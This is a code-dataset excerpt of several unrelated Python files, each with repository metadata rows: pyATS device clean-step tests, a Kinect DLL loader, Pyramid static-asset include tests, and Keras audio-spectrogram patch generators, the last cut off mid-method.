104417 drwx 4096 Apr 10 2017 09:09:11 -07:00 .prst_sync
80321 drwx 4096 Nov 25 2016 19:40:38 -07:00 .rollback_timer
64257 drwx 4096 Nov 25 2016 19:41:02 -07:00 .installer
48193 drwx 4096 Nov 25 2016 19:41:14 -07:00 virtual-instance-stby-sync
1940303872 bytes total (1036210176 bytes free)
'''
}
# And we want the execute method to be mocked with device console output.
self.device.execute = Mock(side_effect=lambda x: data[x])
# We expect this step to fail so make sure it raises the signal
with self.assertRaises(TerminateStepSignal):
self.cls.verify_enough_available_disk_space(
steps=steps, device=self.device, copy_dir=copy_dir, copy_file=copy_file
)
# Check the overall result is as expected
self.assertEqual(Failed, steps.details[0].result)
def test_fail_to_get_available_disk_space(self):
# Make sure we have a unique Steps() object for result verification
steps = Steps()
copy_dir = "bootflash:/"
copy_file = "test.bin"
data = {'dir bootflash:/': '''
Directory of bootflash:/
11 drwx 16384 Nov 25 2016 19:32:53 -07:00 lost+found
12 -rw- 0 Dec 13 2016 11:36:36 -07:00 ds_stats.txt
104417 drwx 4096 Apr 10 2017 09:09:11 -07:00 .prst_sync
80321 drwx 4096 Nov 25 2016 19:40:38 -07:00 .rollback_timer
64257 drwx 4096 Nov 25 2016 19:41:02 -07:00 .installer
48193 drwx 4096 Nov 25 2016 19:41:14 -07:00 virtual-instance-stby-sync
8033 drwx 4096 Nov 25 2016 18:42:07 -07:00 test.bin
'''
}
# And we want the execute method to be mocked with device console output.
self.device.execute = Mock(side_effect=lambda x: data[x])
# We expect this step to fail so make sure it raises the signal
with self.assertRaises(TerminateStepSignal):
self.cls.verify_enough_available_disk_space(
steps=steps, device=self.device, copy_dir=copy_dir, copy_file=copy_file
)
# Check the overall result is as expected
self.assertEqual(Failed, steps.details[0].result)
def test_fail_low_available_disk_space(self):
# Make sure we have a unique Steps() object for result verification
steps = Steps()
copy_dir = "bootflash:/"
copy_file = "test.bin"
data = {'dir bootflash:/': '''
Directory of bootflash:/
11 drwx 16384 Nov 25 2016 19:32:53 -07:00 lost+found
12 -rw- 0 Dec 13 2016 11:36:36 -07:00 ds_stats.txt
104417 drwx 4096 Apr 10 2017 09:09:11 -07:00 .prst_sync
80321 drwx 4096 Nov 25 2016 19:40:38 -07:00 .rollback_timer
64257 drwx 4096 Nov 25 2016 19:41:02 -07:00 .installer
48193 drwx 4096 Nov 25 2016 19:41:14 -07:00 virtual-instance-stby-sync
8033 drwx 8500 Nov 25 2016 18:42:07 -07:00 test.bin
1940303872 bytes total (7000 bytes free)
'''
}
# And we want the execute method to be mocked with device console output.
self.device.execute = Mock(side_effect=lambda x: data[x])
# We expect this step to fail so make sure it raises the signal
with self.assertRaises(TerminateStepSignal):
self.cls.verify_enough_available_disk_space(
steps=steps, device=self.device, copy_dir=copy_dir, copy_file=copy_file
)
# Check the overall result is as expected
self.assertEqual(Failed, steps.details[0].result)
class CreateBackup(unittest.TestCase):
def setUp(self):
# Instantiate class object
self.cls = BackupFileOnDevice()
# Instantiate device object. This also sets up commonly needed
# attributes and Mock objects associated with the device.
self.device = create_test_device('PE1', os='iosxe')
def test_pass(self):
# Make sure we have a unique Steps() object for result verification
steps = Steps()
copy_dir = "bootflash:/"
copy_file = "test.bin"
# And we want the copy method to be mocked so that
# it simulates pass case.
self.device.copy = Mock()
# Call the method to be tested (clean step inside class)
self.cls.create_backup(
steps=steps, device=self.device, copy_dir=copy_dir, copy_file=copy_file
)
# Check that the result is expected
self.assertEqual(Passed, steps.details[0].result)
def test_fail_to_create_backup(self):
# Make sure we have a unique Steps() object for result verification
steps = Steps()
copy_dir = "bootflash:/"
copy_file = "test.bin"
# And we want the copy method to be mocked to rise exception, so that
# it simulates fail case.
self.device.copy = Mock(side_effect=Exception)
# We expect this step to fail so make sure it raises the signal
with self.assertRaises(TerminateStepSignal):
self.cls.create_backup(
steps=steps, device=self.device, copy_dir=copy_dir, copy_file=copy_file
)
# Check the overall result is as expected
self.assertEqual(Failed, steps.details[0].result)
| 43.315 | 109 | 0.5819 | 1,121 | 8,663 | 4.408564 | 0.154326 | 0.021854 | 0.034601 | 0.035613 | 0.900243 | 0.881627 | 0.881627 | 0.881627 | 0.881627 | 0.880008 | 0 | 0.124735 | 0.346647 | 8,663 | 199 | 110 | 43.532663 | 0.74841 | 0.207434 | 0 | 0.760331 | 0 | 0.033058 | 0.469917 | 0.015225 | 0 | 0 | 0 | 0 | 0.082645 | 1 | 0.066116 | false | 0.041322 | 0.066116 | 0 | 0.14876 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d15dade0f31f73c0006ef49e1874707dffc107c6 | 847 | py | Python | infer_tools/legacy/Kinect.py | TaehaKim-Kor/EVCIDNet | 4c8152a8de217f3a6203c5cb93a49c9ad8ca2bd9 | [
"Apache-2.0"
] | null | null | null | infer_tools/legacy/Kinect.py | TaehaKim-Kor/EVCIDNet | 4c8152a8de217f3a6203c5cb93a49c9ad8ca2bd9 | [
"Apache-2.0"
] | null | null | null | infer_tools/legacy/Kinect.py | TaehaKim-Kor/EVCIDNet | 4c8152a8de217f3a6203c5cb93a49c9ad8ca2bd9 | [
"Apache-2.0"
] | null | null | null | import ctypes
import cv2
import os
lib_cv = ctypes.CDLL('C:/Users/anstn/Desktop/KINECT_DLL/Kinect_DLL/packages/opencv/build/x64/vc15/bin/opencv_world453.dll')
libd_cv = ctypes.CDLL('C:/Users/anstn/Desktop/KINECT_DLL/Kinect_DLL/packages/opencv/build/x64/vc15/bin/opencv_world453d.dll')
lib_k4a = ctypes.CDLL('C:/Users/anstn/Desktop/KINECT_DLL/Kinect_DLL/packages/Microsoft.Azure.Kinect.Sensor.1.4.1/lib/native/amd64/release/k4a.dll')
lib_de = ctypes.CDLL('C:/Users/anstn/Desktop/KINECT_DLL/Kinect_DLL/packages/Microsoft.Azure.Kinect.Sensor.1.4.1/lib/native/amd64/release/depthengine_2_0.dll')
lib_k4arec = ctypes.CDLL('C:/Users/anstn/Desktop/KINECT_DLL/Kinect_DLL/packages/Microsoft.Azure.Kinect.Sensor.1.4.1/lib/native/amd64/release/k4arecord.dll')
kinect_lib = ctypes.CDLL('C:/Users/anstn/Desktop/KINECT_DLL/Kinect_DLL/x64/Debug/Kinect_DLL.dll')
| 84.7 | 158 | 0.813459 | 145 | 847 | 4.593103 | 0.262069 | 0.175676 | 0.099099 | 0.144144 | 0.786787 | 0.786787 | 0.786787 | 0.786787 | 0.786787 | 0.786787 | 0 | 0.046173 | 0.028335 | 847 | 9 | 159 | 94.111111 | 0.763062 | 0 | 0 | 0 | 0 | 0.555556 | 0.769776 | 0.769776 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 10 |
0f133f29f7a939333449718953f0726acc048f2f | 177 | py | Python | bpd/models/__init__.py | cassidylaidlaw/boltzmann-policy-distribution | 573476dd3e86934dc8884340c42512caa896e9a7 | [
"MIT"
] | null | null | null | bpd/models/__init__.py | cassidylaidlaw/boltzmann-policy-distribution | 573476dd3e86934dc8884340c42512caa896e9a7 | [
"MIT"
] | null | null | null | bpd/models/__init__.py | cassidylaidlaw/boltzmann-policy-distribution | 573476dd3e86934dc8884340c42512caa896e9a7 | [
"MIT"
] | null | null | null | from . import pickup_ring_models # noqa: F401
try:
from . import overcooked_models # noqa: F401
except ImportError:
pass # Might fail if Overcooked isn't installed.
| 25.285714 | 53 | 0.728814 | 24 | 177 | 5.25 | 0.75 | 0.15873 | 0.222222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.042857 | 0.20904 | 177 | 6 | 54 | 29.5 | 0.857143 | 0.355932 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.2 | 0.6 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
0f44b5f3bf3f63575c7245b3e1d31346c9afeb9c | 5,799 | py | Python | tests/test_includer.py | djedproject/djed_static | 5589b44979a0885a16a9f13275e5e3b2a69aab2a | [
"0BSD"
] | null | null | null | tests/test_includer.py | djedproject/djed_static | 5589b44979a0885a16a9f13275e5e3b2a69aab2a | [
"0BSD"
] | null | null | null | tests/test_includer.py | djedproject/djed_static | 5589b44979a0885a16a9f13275e5e3b2a69aab2a | [
"0BSD"
] | null | null | null | from pyramid.response import Response
from djed.testing import BaseTestCase
class TestIncluder(BaseTestCase):
_includes = ('djed.static',)
def test_components(self):
def view(request):
request.include('jquery')
return Response('<html><head></head><body></body></html>')
self.config.add_route('view', '/')
self.config.add_view(view, route_name='view')
self.config.add_bower_components('tests:static/dir1')
app = self.make_app()
response = app.get('/')
self.assertEqual(response.body, (
b'<html><head>'
b'<script type="text/javascript" '
b'src="/bowerstatic/components/jquery/1.0.0/jquery.js">'
b'</script></head><body></body></html>'))
response = app.get('/bowerstatic/components/jquery/1.0.0/jquery.js')
self.assertEqual(response.body, b'/* dir1/jquery.js */\n')
def test_components_in_template(self):
def view(request):
return {}
self.config.include('pyramid_chameleon')
self.config.add_route('view', '/')
self.config.add_view(
view, route_name='view', renderer='tests:templates/index.pt')
self.config.add_bower_components('tests:static/dir1')
app = self.make_app()
response = app.get('/')
self.assertIn(
b'<script type="text/javascript" '
b'src="/bowerstatic/components/jquery/1.0.0/jquery.js">'
b'</script>', response.body)
response = app.get('/bowerstatic/components/jquery/1.0.0/jquery.js')
self.assertEqual(response.body, b'/* dir1/jquery.js */\n')
def test_components_not_exist_errors(self):
from pyramid.exceptions import ConfigurationError
self.assertRaises(ConfigurationError, self.request.include, 'jquery')
self.assertRaises(ConfigurationError, self.request.include,
'not-exist')
def test_local_component(self):
def view(request):
request.include('myapp')
return Response('<html><head></head><body></body></html>')
self.config.add_route('view', '/')
self.config.add_view(view, route_name='view')
self.config.add_bower_components('tests:static/dir1')
self.config.add_bower_component('tests:static/local/myapp')
app = self.make_app()
response = app.get('/')
self.assertEqual(response.body, (
b'<html><head>'
b'<script type="text/javascript" src='
b'"/bowerstatic/components/jquery/1.0.0/jquery.js">'
b'</script>\n<script type="text/javascript" '
b'src="/bowerstatic/components/myapp/1.0.0/myapp.js"></script>'
b'</head><body></body></html>'))
response = app.get('/bowerstatic/components/myapp/1.0.0/myapp.js')
self.assertEqual(response.body, b'/* myapp.js */\n')
def test_local_component_in_template(self):
def view(request):
return {}
self.config.include('pyramid_chameleon')
self.config.add_route('view', '/')
self.config.add_view(
view, route_name='view', renderer='tests:templates/index_local.pt')
self.config.add_bower_components('tests:static/dir1')
self.config.add_bower_component('tests:static/local/myapp')
app = self.make_app()
response = app.get('/')
self.assertIn((
b'<script type="text/javascript" src='
b'"/bowerstatic/components/jquery/1.0.0/jquery.js">'
b'</script>\n<script type="text/javascript" '
b'src="/bowerstatic/components/myapp/1.0.0/myapp.js"></script>'),
response.body)
response = app.get('/bowerstatic/components/jquery/1.0.0/jquery.js')
self.assertEqual(response.body, b'/* dir1/jquery.js */\n')
response = app.get('/bowerstatic/components/myapp/1.0.0/myapp.js')
self.assertEqual(response.body, b'/* myapp.js */\n')
def test_custom_components(self):
def view(request):
request.include('jquery', 'lib')
return Response('<html><head></head><body></body></html>')
self.config.add_route('view', '/')
self.config.add_view(view, route_name='view')
self.config.add_bower_components('tests:static/dir1', name='lib')
app = self.make_app()
response = app.get('/')
self.assertEqual(response.body, (
b'<html><head>'
b'<script type="text/javascript" '
b'src="/bowerstatic/lib/jquery/1.0.0/jquery.js">'
b'</script>'
b'</head><body></body></html>'))
response = app.get('/bowerstatic/lib/jquery/1.0.0/jquery.js')
self.assertEqual(response.body, b'/* dir1/jquery.js */\n')
def test_custom_local_component(self):
def view(request):
request.include('myapp', 'lib')
return Response('<html><head></head><body></body></html>')
self.config.add_route('view', '/')
self.config.add_view(view, route_name='view')
self.config.add_bower_components('tests:static/dir1', name='lib')
self.config.add_bower_component('tests:static/local/myapp', 'lib')
app = self.make_app()
response = app.get('/')
self.assertEqual(response.body, (
b'<html><head>'
b'<script type="text/javascript" src='
b'"/bowerstatic/lib/jquery/1.0.0/jquery.js">'
b'</script>\n<script type="text/javascript" '
b'src="/bowerstatic/lib/myapp/1.0.0/myapp.js"></script>'
b'</head><body></body></html>'))
response = app.get('/bowerstatic/lib/myapp/1.0.0/myapp.js')
self.assertEqual(response.body, b'/* myapp.js */\n')
| 34.724551 | 79 | 0.593378 | 705 | 5,799 | 4.788652 | 0.09078 | 0.068128 | 0.080865 | 0.087974 | 0.933946 | 0.930391 | 0.899585 | 0.899585 | 0.870261 | 0.819905 | 0 | 0.013075 | 0.235041 | 5,799 | 166 | 80 | 34.933735 | 0.747971 | 0 | 0 | 0.700855 | 0 | 0 | 0.336437 | 0.235213 | 0 | 0 | 0 | 0 | 0.128205 | 1 | 0.111111 | false | 0 | 0.025641 | 0.017094 | 0.205128 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
0f617825587a0c83bdc151e087f5e36f916a6565 | 112 | py | Python | tests/_base3.py | garywu/pipedream | d89a4031d5ee78c05c6845341607a59528f0bd75 | [
"BSD-3-Clause"
] | 8 | 2018-02-21T04:13:25.000Z | 2020-04-24T20:05:47.000Z | tests/_base3.py | garywu/pipedream | d89a4031d5ee78c05c6845341607a59528f0bd75 | [
"BSD-3-Clause"
] | 1 | 2019-05-13T13:14:32.000Z | 2019-05-13T13:14:32.000Z | tests/_base3.py | garywu/pypedream | d89a4031d5ee78c05c6845341607a59528f0bd75 | [
"BSD-3-Clause"
] | null | null | null | import unittest_rand_gen_state
class RandStateSaverBase(metaclass = unittest_rand_gen_state.Saver):
pass
| 16 | 68 | 0.830357 | 14 | 112 | 6.214286 | 0.714286 | 0.275862 | 0.344828 | 0.45977 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 112 | 6 | 69 | 18.666667 | 0.887755 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 9 |
0f7b6b2f503ff282222eee089eba8758fd525e79 | 33,788 | py | Python | data.py | Aralas/icassp19 | 5f54e7d6b9818fabf63e87be22786a45c6b2c9fc | [
"MIT"
] | null | null | null | data.py | Aralas/icassp19 | 5f54e7d6b9818fabf63e87be22786a45c6b2c9fc | [
"MIT"
] | null | null | null | data.py | Aralas/icassp19 | 5f54e7d6b9818fabf63e87be22786a45c6b2c9fc | [
"MIT"
] | null | null | null |
import numpy as np
import os
import utils
from sklearn.preprocessing import StandardScaler
from keras.utils import Sequence, to_categorical
# NOTE:
# these data generators work for small-medium size datasets under no memory constraints, eg RAM 32GB or more.
# If used with smaller RAMs, a slightly different approach for feeding the net may be needed.
def get_label_files(filelist=None, dire=None, suffix_in=None, suffix_out=None):
"""
:param filelist:
:param dire:
:param suffix_in:
:param suffix_out:
:return:
"""
nb_files_total = len(filelist)
labels = np.zeros((nb_files_total, 1), dtype=np.float32)
for f_id in range(nb_files_total):
labels[f_id] = utils.load_tensor(in_path=os.path.join(dire, filelist[f_id].replace(suffix_in, suffix_out)))
return labels
class DataGeneratorPatch(Sequence):
"""
Reads data from disk and returns batches.
"""
def __init__(self, feature_dir=None, file_list=None, params_learn=None, params_extract=None,
suffix_in='_mel', suffix_out='_label', floatx=np.float32, scaler=None):
self.data_dir = feature_dir
self.list_fnames = file_list
self.batch_size = params_learn.get('batch_size')
self.floatx = floatx
self.suffix_in = suffix_in
self.suffix_out = suffix_out
self.patch_len = int(params_extract.get('patch_len'))
self.patch_hop = int(params_extract.get('patch_hop'))
# Given a directory with precomputed features in files:
# - create the variable self.features with all the TF patches of all the files in the feature_dir
# - create the variable self.labels with the corresponding labels (at patch level, inherited from file)
if feature_dir is not None:
self.get_patches_features_labels(feature_dir, file_list)
# standardize the data
self.features2d = self.features.reshape(-1, self.features.shape[2])
# if train set, create scaler, fit, transform, and save the scaler
if scaler is None:
self.scaler = StandardScaler()
self.features2d = self.scaler.fit_transform(self.features2d)
# this scaler will be used later on to scale val and test data
else:
# if we are in val or test set, load the training scaler as a param and transform
self.features2d = scaler.transform(self.features2d)
# after scaling in 2D, go back to tensor
self.features = self.features2d.reshape(self.nb_inst_total, self.patch_len, self.feature_size)
# but all the patches are contiguously ordered. shuffle them before making batches
self.on_epoch_end()
self.n_classes = params_learn.get('n_classes')
def get_num_instances_per_file(self, f_name):
"""
Return the number of context_windows, patches, or instances generated out of a given file
"""
shape = utils.get_shape(os.path.join(f_name.replace('.data', '.shape')))
file_frames = float(shape[0])
return np.maximum(1, int(np.ceil((file_frames - self.patch_len) / self.patch_hop)))
def get_feature_size_per_file(self, f_name):
"""
Return the dimensionality of the features in a given file.
Typically, this will be the number of bins in a T-F representation
"""
shape = utils.get_shape(os.path.join(f_name.replace('.data', '.shape')))
return shape[1]
def get_patches_features_labels(self, feature_dir, file_list):
"""
Given a directory with precomputed features in files:
- create the variable self.features with all the TF patches of all the files in the feature_dir
- create the variable self.labels with the corresponding labels (at patch level, inherited from file)
- shuffle them
"""
assert os.path.isdir(os.path.dirname(feature_dir)), "path to feature directory does not exist"
print('Loading self.features...')
# list of file names containing features
self.file_list = [f for f in file_list if f.endswith(self.suffix_in + '.data') and
os.path.isfile(os.path.join(feature_dir, f.replace(self.suffix_in, self.suffix_out)))]
self.nb_files = len(self.file_list)
assert self.nb_files > 0, "there are no features files in the feature directory"
self.feature_dir = feature_dir
# For all set, cumulative sum of instances (or T_F patches) per file
self.nb_inst_cum = np.cumsum(np.array(
[0] + [self.get_num_instances_per_file(os.path.join(self.feature_dir, f_name))
for f_name in self.file_list], dtype=int))
self.nb_inst_total = self.nb_inst_cum[-1]
# how many batches can we fit in the set
self.nb_iterations = int(np.floor(self.nb_inst_total / self.batch_size))
# feature size (last dimension of the output)
self.feature_size = self.get_feature_size_per_file(f_name=os.path.join(self.feature_dir, self.file_list[0]))
# init the variables with features and labels
self.features = np.zeros((self.nb_inst_total, self.patch_len, self.feature_size), dtype=self.floatx)
self.labels = np.zeros((self.nb_inst_total, 1), dtype=self.floatx)
# fetch all data from hard-disk
for f_id in range(self.nb_files):
# for every file in disk perform slicing into T-F patches, and store them in tensor self.features
self.fetch_file_2_tensor(f_id)
def fetch_file_2_tensor(self, f_id):
"""
# for a file specified by id,
# perform slicing into T-F patches, and store them in tensor self.features
:param f_id:
:return:
"""
mel_spec = utils.load_tensor(in_path=os.path.join(self.feature_dir, self.file_list[f_id]))
label = utils.load_tensor(in_path=os.path.join(self.feature_dir,
self.file_list[f_id].replace(self.suffix_in, self.suffix_out)))
# indexes to store patches in self.features, according to the nb of instances from the file
idx_start = self.nb_inst_cum[f_id] # start for a given file
idx_end = self.nb_inst_cum[f_id + 1] # end for a given file
# slicing + storing in self.features
# copy each TF patch of size (context_window_frames,feature_size) in self.features
idx = 0 # to index the different patches of f_id within self.features
start = 0 # starting frame within f_id for each T-F patch
while idx < (idx_end - idx_start):
self.features[idx_start + idx] = mel_spec[start: start + self.patch_len]
# update indexes
start += self.patch_hop
idx += 1
self.labels[idx_start: idx_end] = label[0]
def __len__(self):
return self.nb_iterations
def __getitem__(self, index):
"""
takes an index (batch number) and returns one batch of self.batch_size
:param index:
:return:
"""
# index is taken care of by the Sequencer inherited
indexes = self.indexes[index * self.batch_size:(index + 1) * self.batch_size]
# fetch labels for the batch
y_int = np.empty((self.batch_size, 1), dtype='int')
for tt in np.arange(self.batch_size):
y_int[tt] = int(self.labels[indexes[tt]])
y_cat = to_categorical(y_int, num_classes=self.n_classes)
# fetch features for the batch and adjust format to input CNN
# (batch_size, 1, time, freq) for channels_first
features = self.features[indexes, np.newaxis]
return features, y_cat
def on_epoch_end(self):
# shuffle data between epochs
self.indexes = np.random.permutation(self.nb_inst_total)
class PatchGeneratorPerFile(object):
"""
Reads whole T_F representations from disk,
and stores T_F patches *for a given entire file* in a tensor
typically for prediction on a test set
"""
def __init__(self, feature_dir=None, file_list=None, params_extract=None,
suffix_in='_mel', floatx=np.float32, scaler=None):
self.data_dir = feature_dir
self.floatx = floatx
self.suffix_in = suffix_in
self.patch_len = int(params_extract.get('patch_len'))
self.patch_hop = int(params_extract.get('patch_hop'))
# Given a directory with precomputed features in files:
# - create the variable self.features with all the TF patches of all the files in the feature_dir
if feature_dir is not None:
self.get_patches_features(feature_dir, file_list)
# standardize the data: assuming this is used for inference
self.features2d = self.features.reshape(-1, self.features.shape[2])
# if we are in val or test subset, load the training scaler as a param and transform
self.features2d = scaler.transform(self.features2d)
# go back to 3D tensor
self.features = self.features2d.reshape(self.nb_patch_total, self.patch_len, self.feature_size)
def get_num_instances_per_file(self, f_name):
"""
Return the number of context_windows or instances generated out of a given file
"""
shape = utils.get_shape(os.path.join(f_name.replace('.data', '.shape')))
file_frames = float(shape[0])
return np.maximum(1, int(np.ceil((file_frames - self.patch_len) / self.patch_hop)))
def get_feature_size_per_file(self, f_name):
"""
Return the dimensionality of the features in a given file.
Typically, this will be the number of bins in a T-F representation
"""
shape = utils.get_shape(os.path.join(f_name.replace('.data', '.shape')))
return shape[1]
def get_patches_features(self, feature_dir, file_list):
"""
Given a directory with precomputed features in files:
- create the variable self.features with all the TF patches of all the files in the feature_dir
"""
assert os.path.isdir(os.path.dirname(feature_dir)), "path to feature directory does not exist"
# list of file names containing features
self.file_list = [f for f in file_list if f.endswith(self.suffix_in + '.data')]
self.nb_files = len(self.file_list)
assert self.nb_files > 0, "there are no features files in the feature directory"
self.feature_dir = feature_dir
# For all set, cumulative sum of instances per file
self.nb_inst_cum = np.cumsum(np.array(
[0] + [self.get_num_instances_per_file(os.path.join(self.feature_dir, f_name))
for f_name in self.file_list], dtype=int))
self.nb_patch_total = self.nb_inst_cum[-1]
# init current file, to keep track of the file yielded for prediction
self.current_f_idx = 0
# feature size (last dimension of the output)
self.feature_size = self.get_feature_size_per_file(f_name=os.path.join(self.feature_dir, self.file_list[0]))
# init the variables with features
self.features = np.zeros((self.nb_patch_total, self.patch_len, self.feature_size), dtype=self.floatx)
# fetch all data from hard-disk
for f_id in range(self.nb_files):
# for every file in disk perform slicing into T-F patches, and store them in tensor self.features
self.fetch_file_2_tensor(f_id)
def fetch_file_2_tensor(self, f_id):
"""
# for a file specified by id,
# perform slicing into T-F patches, and store them in tensor self.features
:param f_id:
:return:
"""
mel_spec = utils.load_tensor(in_path=os.path.join(self.feature_dir, self.file_list[f_id]))
# indexes to store patches in self.features, according to the nb of instances from the file
idx_start = self.nb_inst_cum[f_id] # start for a given file
idx_end = self.nb_inst_cum[f_id + 1] # end for a given file
# slicing + storing in self.features
# copy each TF patch of size (context_window_frames,feature_size) in self.features
idx = 0 # to index the different patches of f_id within self.features
start = 0 # starting frame within f_id for each T-F patch
while idx < (idx_end - idx_start):
self.features[idx_start + idx] = mel_spec[start: start + self.patch_len]
# update indexes
start += self.patch_hop
idx += 1
def get_patches_file(self):
"""
Returns all the patches for one single audio clip
"""
self.current_f_idx += 1
# ranges form 1 to self.nb_files (ignores 0)
assert self.current_f_idx <= self.nb_files, 'All the test files have been dispatched'
# fetch features in the batch and adjust format to input CNN
# (nb_patches_per_file, 1, time, freq)
features = self.features[self.nb_inst_cum[self.current_f_idx-1]: self.nb_inst_cum[self.current_f_idx], np.newaxis]
return features
class DataGeneratorPatchOrigin(Sequence):
"""
Reads data from disk and returns batches.
allows to create one-hot encoded vectors carrying flags, ie 100 instead of 1.
this is used in the loss functions to distinguish patches coming from noisy or clean set
"""
def __init__(self, feature_dir=None, file_list=None, params_learn=None, params_extract=None,
suffix_in='_mel', suffix_out='_label', floatx=np.float32, scaler=None):
self.data_dir = feature_dir
self.list_fnames = file_list
self.batch_size = params_learn.get('batch_size')
self.floatx = floatx
self.suffix_in = suffix_in
self.suffix_out = suffix_out
self.patch_len = int(params_extract.get('patch_len'))
self.patch_hop = int(params_extract.get('patch_hop'))
self.noisy_ids = params_learn.get('noisy_ids')
# Given a directory with precomputed features in files:
# - create the variable self.features with all the TF patches of all the files in the feature_dir
# - create the variable self.labels with the corresponding labels (at patch level, inherited from file)
if feature_dir is not None:
self.get_patches_features_labels(feature_dir, file_list)
# standardize the data
self.features2d = self.features.reshape(-1, self.features.shape[2])
# if train set, create scaler, fit, transform, and save the scaler
if scaler is None:
self.scaler = StandardScaler()
self.features2d = self.scaler.fit_transform(self.features2d)
# this scaler will be used later on to scale val and test data
else:
# if we are in val or test set, load the training scaler as a param and transform
self.features2d = scaler.transform(self.features2d)
# after scaling in 2D, go back to tensor
self.features = self.features2d.reshape(self.nb_inst_total, self.patch_len, self.feature_size)
self.on_epoch_end()
self.n_classes = params_learn.get('n_classes')
def get_num_instances_per_file(self, f_name):
"""
Return the number of context_windows, patches, or instances generated out of a given file
"""
shape = utils.get_shape(os.path.join(f_name.replace('.data', '.shape')))
file_frames = float(shape[0])
return np.maximum(1, int(np.ceil((file_frames - self.patch_len) / self.patch_hop)))
def get_feature_size_per_file(self, f_name):
"""
Return the dimensionality of the features in a given file.
Typically, this will be the number of bins in a T-F representation
"""
shape = utils.get_shape(os.path.join(f_name.replace('.data', '.shape')))
return shape[1]
def get_patches_features_labels(self, feature_dir, file_list):
"""
Given a directory with precomputed features in files:
- create the variable self.features with all the TF patches of all the files in the feature_dir
- create the variable self.labels with the corresponding labels (at patch level, inherited from file)
- shuffle them
"""
assert os.path.isdir(os.path.dirname(feature_dir)), "path to feature directory does not exist"
print('Loading self.features...')
# list of file names containing features
self.file_list = [f for f in file_list if f.endswith(self.suffix_in + '.data') and
os.path.isfile(os.path.join(feature_dir, f.replace(self.suffix_in, self.suffix_out)))]
self.nb_files = len(self.file_list)
assert self.nb_files > 0, "there are no features files in the feature directory"
self.feature_dir = feature_dir
# For all set, cumulative sum of instances (or T_F patches) per file
self.nb_inst_cum = np.cumsum(np.array(
[0] + [self.get_num_instances_per_file(os.path.join(self.feature_dir, f_name))
for f_name in self.file_list], dtype=int))
self.nb_inst_total = self.nb_inst_cum[-1]
# how many batches can we fit in the set
self.nb_iterations = int(np.floor(self.nb_inst_total / self.batch_size))
# feature size (last dimension of the output)
self.feature_size = self.get_feature_size_per_file(f_name=os.path.join(self.feature_dir, self.file_list[0]))
# init the variables with features and labels
self.features = np.zeros((self.nb_inst_total, self.patch_len, self.feature_size), dtype=self.floatx)
self.labels = np.zeros((self.nb_inst_total, 1), dtype=self.floatx)
# analogous column vector to flag patches coming from noisy subset of train data
# init to 0. Only 1 if they come from noisy subset
self.noisy_patches = np.zeros((self.nb_inst_total, 1), dtype=self.floatx)
# fetch all data from hard-disk
for f_id in range(self.nb_files):
# for every file in disk, perform slicing into T-F patches, and store them in tensor self.features
self.fetch_file_2_tensor(f_id)
def fetch_file_2_tensor(self, f_id):
"""
# for a file specified by id,
# perform slicing into T-F patches, and store them in tensor self.features
:param f_id:
:return:
"""
mel_spec = utils.load_tensor(in_path=os.path.join(self.feature_dir, self.file_list[f_id]))
label = utils.load_tensor(in_path=os.path.join(self.feature_dir,
self.file_list[f_id].replace(self.suffix_in, self.suffix_out)))
# indexes to store patches in self.features, according to the nb of instances from the file
idx_start = self.nb_inst_cum[f_id] # start for a given file
idx_end = self.nb_inst_cum[f_id + 1] # end for a given file
# slicing + storing in self.features
# copy each TF patch of size (context_window_frames,feature_size) in self.features
idx = 0 # to index the different patches of f_id within self.features
start = 0 # starting frame within f_id for each T-F patch
while idx < (idx_end - idx_start):
self.features[idx_start + idx] = mel_spec[start: start + self.patch_len]
# update indexes
start += self.patch_hop
idx += 1
self.labels[idx_start: idx_end] = label[0]
if int(self.file_list[f_id].split('_')[0]) in self.noisy_ids:
# if the clip comes from noisy subset, flag to 1 all its patches
self.noisy_patches[idx_start: idx_end] = 1
def __len__(self):
return self.nb_iterations
def __getitem__(self, index):
"""
takes an index (batch number) and returns one batch of self.batch_size
:param index:
:return:
"""
# index is taken care of by the Sequencer inherited
indexes = self.indexes[index * self.batch_size:(index + 1) * self.batch_size]
# fetch labels for the batch
y_int = np.empty((self.batch_size, 1), dtype='int')
for tt in np.arange(self.batch_size):
y_int[tt] = int(self.labels[indexes[tt]])
y_cat = to_categorical(y_int, num_classes=self.n_classes)
# tune the one-hot vectors of the patches coming from clips in the noisy subset
for tt in np.arange(self.batch_size):
if self.noisy_patches[indexes[tt]] == 1:
